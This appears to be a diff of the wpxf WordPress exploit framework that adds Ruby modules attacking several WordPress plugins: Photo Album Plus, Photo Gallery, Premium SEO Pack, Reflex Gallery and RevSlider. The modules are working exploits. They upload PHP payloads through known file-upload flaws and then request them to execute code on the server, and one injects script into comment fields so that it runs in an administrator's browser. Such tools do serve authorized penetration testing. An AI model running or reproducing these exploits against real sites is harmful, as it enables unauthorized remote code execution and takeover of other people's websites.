wpxf 2.0.0a

data/lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb

@@ -0,0 +1,89 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::PhotoAlbumPlusXssShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpClient
+  include Wpxf::WordPress::Login
+  include Wpxf::WordPress::Plugin
+  include Wpxf::WordPress::Xss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Photo Album Plus 6.1.2 XSS Shell Upload',
+      desc: 'The vulnerability exists due to the absence of filtration of '\
+            'user-supplied input passed via the "comname" and "comemail" '\
+            'HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/'\
+            'wppa-ajax-front.php" script when posting a comment.'\
+            "\n"\
+            'A remote attacker can post a specially crafted message '\
+            'containing malicious HTML or script code and execute it in '\
+            'the administrator\'s browser in context of the vulnerable '\
+            'website, when an administrator views images or comments in '\
+            'the administrative interface.',
+      author: [
+        'High-Tech Bridge Security Research Lab', # Discovery and disclosure
+        'rastating'                               # WPXF module
+      ],
+      references: [
+        ['CVE', '2015-3647'],
+        ['WPVDB', '7996'],
+        ['URL', 'https://www.htbridge.com/advisory/HTB23257']
+      ],
+      date: 'May 20 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-photo-album-plus', '6.1.3')
+  end
+
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'wp-photo-album-plus')
+  end
+
+  def ajax_url
+    normalize_uri(plugin_url, 'wppa-ajax-front.php')
+  end
+
+  def post_script
+    execute_post_request(
+      url: ajax_url,
+      body: {
+        'action'      => 'wppa',
+        'wppa-action' => 'do-comment',
+        'photo-id'    => Utility::Text.rand_numeric(3),
+        'comment'     => Utility::Text.rand_alpha(50),
+        'comemail'    => "#{Utility::Text.rand_alpha(10)}@#{Utility::Text.rand_alpha(10)}.com",
+        'comname'     => "#{Utility::Text.rand_alpha(8)}<script>#{xss_include_script}</script>"
+      }
+    )
+  end
+
+  def run
+    return false unless super
+
+    # Success will determined in another procedure, so initialize to false.
+    @success = false
+
+    emit_info 'Storing script...'
+    emit_info xss_include_script, true
+    res = post_script
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+
+    emit_success "Script stored and will be executed upon visiting /wp-admin/admin.php?page=wppa_manage_comments"
+    start_http_server
+
+    return @success
+  end
+end

data/lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb

@@ -0,0 +1,128 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::PhotoGalleryShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpClient
+  include Wpxf::WordPress::Login
+  include Wpxf::WordPress::Plugin
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Photo Gallery Shell Upload',
+      desc: 'Photo Gallery Plugin for WordPress contains a flaw that allows a '\
+            'remote attacker to execute arbitrary PHP code. This flaw exists'\
+            'because the photo-gallery\photo-gallery.php script allows access'\
+            'to filemanager\UploadHandler.php. The post() method in '\
+            'UploadHandler.php does not properly verify or sanitize '\
+            'user-uploaded files.',
+      author: [
+        'Kacper Szurek', # Vulnerability disclosure
+        'rastating'      # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7769'],
+        ['CVE', '2014-9312'],
+        ['URL', 'http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html']
+      ],
+      date: 'Nov 11 2014'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'username',
+        desc: 'The WordPress username to authenticate with'
+      ),
+      StringOption.new(
+        name: 'password',
+        desc: 'The WordPress password to authenticate with'
+      )
+    ])
+  end
+
+  def username
+    normalized_option_value('username')
+  end
+
+  def password
+    normalized_option_value('password')
+  end
+
+  def check
+    check_plugin_version_from_readme('photo-gallery', '1.2.6')
+  end
+
+  def payload_body_builder(name)
+    builder = Utility::BodyBuilder.new
+    zipped_files =  { "#{name}.php" => payload.encoded }
+    builder.add_zip_file('files', zipped_files, "#{name}.zip")
+    builder
+  end
+
+  def extract_name_from_res(res)
+    begin
+      json = JSON.parse(res.body)
+      if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil?
+        return nil
+      else
+        return json['files'][0]['name'][0..-5]
+      end
+    rescue
+    end
+
+    nil
+  end
+
+  def run
+    return false unless super
+
+    cookie = authenticate_with_wordpress(username, password)
+    return false unless cookie
+
+    emit_info 'Preparing payload...'
+    payload_name = Utility::Text.rand_alpha(10)
+    builder = payload_body_builder(payload_name)
+    upload_dir = "#{Utility::Text.rand_alpha(10)}/"
+
+    emit_info 'Uploading payload...'
+    res = nil
+    builder.create do |body|
+      res = execute_post_request(
+        url: wordpress_url_admin_ajax,
+        params: { 'action' => 'bwg_UploadHandler', 'dir' => upload_dir },
+        body: body,
+        cookie: cookie
+      )
+    end
+
+    if res.nil? || res.code != 200
+      emit_error 'Failed to upload payload'
+      emit_error "Server responded with code #{res.code}", true
+      return false
+    else
+      emit_success 'Uploaded the payload', true
+    end
+
+    emit_info 'Parsing server response...'
+    uploaded_name = extract_name_from_res(res)
+    if uploaded_name.nil?
+      emit_info "Server responded with: #{res.body}", true
+      emit_error 'Unable to parse the server response'
+      return false
+    end
+
+    php_file_name = "#{uploaded_name}.php"
+    payload_url = normalize_uri(wordpress_url_admin, upload_dir, uploaded_name, php_file_name)
+    emit_success 'Parsed response', true
+    emit_success "Payload uploaded to #{payload_url}", true
+
+    emit_info 'Executing the payload...'
+    res = execute_get_request(url: payload_url)
+    if res && res.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+
+    true
+  end
+end

data/lib/wpxf/modules/exploit/shell/premium_seo_pack_shell_upload.rb

@@ -0,0 +1,35 @@
+# frozen_string_literal: true
+
+require_rel './woocommerce_amazon_affiliates_v8_shell_upload'
+
+class Wpxf::Exploit::PremiumSeoPackShellUpload < Wpxf::Exploit::WoocommerceAmazonAffiliatesV8ShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'Premium SEO Pack < v1.9 Unauthenticated Shell Upload',
+      references: [
+        ['WPVDB', '7934']
+      ]
+    )
+  end
+
+  def emit_usage_info
+    emit_warning 'When executing this module, the ajax.php file in premium-seo-pack/modules/remote_support will be deleted. '\
+                 'In order to be able to re-use this module on the same target, be sure to re-create ajax.php if ' \
+                 'the selected payload is unable to re-create it automatically.'
+  end
+
+  def check
+    readme = normalize_uri(wordpress_url_plugins, 'premium-seo-pack', 'changelog.txt')
+    check_version_from_custom_file(readme, /##\s\[(\d\.\d(\.\d)*)\]/, '1.9')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'premium-seo-pack', 'modules', 'remote_support', 'remote_tunnel.php')
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_plugins, 'premium-seo-pack', 'modules', 'remote_support', 'ajax.php')
+  end
+end

data/lib/wpxf/modules/exploit/shell/reflex_gallery_shell_upload.rb

@@ -0,0 +1,91 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::ReflexGalleryShellUpload < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Reflex Gallery Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions '\
+            '<= 3.1.3 of the Reflex Gallery plugin which '\
+            'allows unauthenticated users to upload and execute PHP scripts '\
+            'in the context of the web server.',
+      author: [
+        'Sammy Forgit',
+        'CrashBandicot',
+        'rastating'
+      ],
+      references: [
+        ['EDB', '36374'],
+        ['WPVDB', '7867']
+      ],
+      date: 'March 16 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('reflex-gallery', '3.1.4')
+  end
+
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'reflex-gallery')
+  end
+
+  def uploader_url
+    normalize_uri(plugin_url, 'admin', 'scripts', 'FileUploader', 'php.php')
+  end
+
+  def payload_body_builder(payload_name)
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('qqfile', payload.encoded, payload_name)
+    builder
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Preparing payload...'
+    year = Time.new.year.to_s
+    month = "%02d" % Time.new.month
+    payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
+    builder = payload_body_builder(payload_name)
+
+    emit_info 'Uploading payload...'
+    res = nil
+    builder.create do |body|
+      res = execute_post_request(
+        url: uploader_url,
+        body: body,
+        params: {
+          'Year' => year,
+          'Month' => month
+        }
+      )
+    end
+
+    if res.nil? || res.timed_out?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 200
+      emit_info "Response code: #{res.code}", true
+      emit_info "Response body: #{res.body}", true
+      emit_error 'Failed to upload payload'
+      return false
+    end
+
+    payload_url = normalize_uri(wordpress_url_wp_content, 'uploads', year, month, payload_name)
+    emit_success "Uploaded the payload to #{payload_url}", true
+
+    emit_info 'Executing the payload...'
+    res = execute_get_request(url: payload_url)
+    if res && res.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+
+    return true
+  end
+end

data/lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb

@@ -0,0 +1,93 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::RevsliderShellUpload < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions '\
+            '<= 3.0.95 of the RevSlider plugin which '\
+            'allows unauthenticated users to upload and execute PHP scripts '\
+            'in the context of the web server.',
+      author: [
+        'Simo Ben youssef', # Vulnerability discovery
+        'rastating'         # WPXF module
+      ],
+      references: [
+        ['EDB', '35385'],
+        ['WPVDB', '7954'],
+        ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/']
+      ],
+      date: 'Nov 26 2014'
+    )
+  end
+
+  def check
+    pattern = /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi
+    release_log_url = normalize_uri(plugin_url, 'release_log.txt')
+    check_version_from_custom_file(release_log_url, pattern, '3.0.96')
+  end
+
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'revslider')
+  end
+
+  def payload_body_builder(payload_name)
+    builder = Utility::BodyBuilder.new
+    zip_fields = { "revslider/#{payload_name}" => payload.encoded }
+    builder.add_zip_file('update_file', zip_fields, 'revslider.zip')
+    builder.add_field('action', 'revslider_ajax_action')
+    builder.add_field('client_action', 'update_plugin')
+    builder
+  end
+
+  def upload_folder
+    normalize_uri(plugin_url, 'temp', 'update_extract', 'revslider')
+  end
+
+  def run
+    super
+    return false unless check_wordpress_and_online
+
+    emit_info 'Preparing payload...'
+    payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
+    builder = payload_body_builder(payload_name)
+
+    emit_info 'Uploading payload...'
+    res = nil
+    builder.create do |body|
+      res = execute_post_request(url: wordpress_url_admin_ajax, body: body)
+    end
+
+    if res.nil? || res.timed_out?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 200
+      emit_info "Response code: #{res.code}", true
+      emit_info "Response body: #{res.body}", true
+      emit_error 'Failed to upload payload'
+      return false
+    end
+
+    if res.body =~ /^0$/
+      emit_error 'Target not vulnerable or the plugin is deactivated'
+      return false
+    end
+
+    payload_url = normalize_uri(upload_folder, payload_name)
+    emit_success "Uploaded the payload to #{payload_url}", true
+
+    emit_info 'Executing the payload...'
+    res = execute_get_request(url: payload_url)
+    if res && res.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+
+    return true
+  end
+end

data/lib/wpxf/modules/exploit/shell/seabird_revslider_shell_upload.rb

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SeabirdRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'Seabird Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Seabird theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end